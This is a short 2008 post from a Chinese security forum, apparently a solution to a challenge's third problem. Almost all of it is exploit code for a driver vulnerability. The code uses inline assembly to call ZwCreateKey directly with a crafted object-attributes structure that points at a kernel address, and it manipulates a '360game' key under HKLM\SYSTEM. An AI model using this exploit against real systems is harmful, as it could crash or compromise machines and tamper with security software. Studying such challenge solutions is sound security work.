-
-
[分享]第三题的解法
-
发表于:
2008-12-23 08:26
22951
-
利用驱动的漏洞:
核心代码:
HKEY hkey=(HKEY)"360game";
WCHAR xx[] = L"xxxx_fuck";
HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");
RegOpenKey(HKEY_LOCAL_MACHINE , "SYSTEM\\" , &hkey);
OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;
InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);
RegDeleteKey(hkey,"360game");
__asm{
push 0
push 0
push 0
push 0
lea eax,oba
push eax
push 0
push 0
call p
}
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!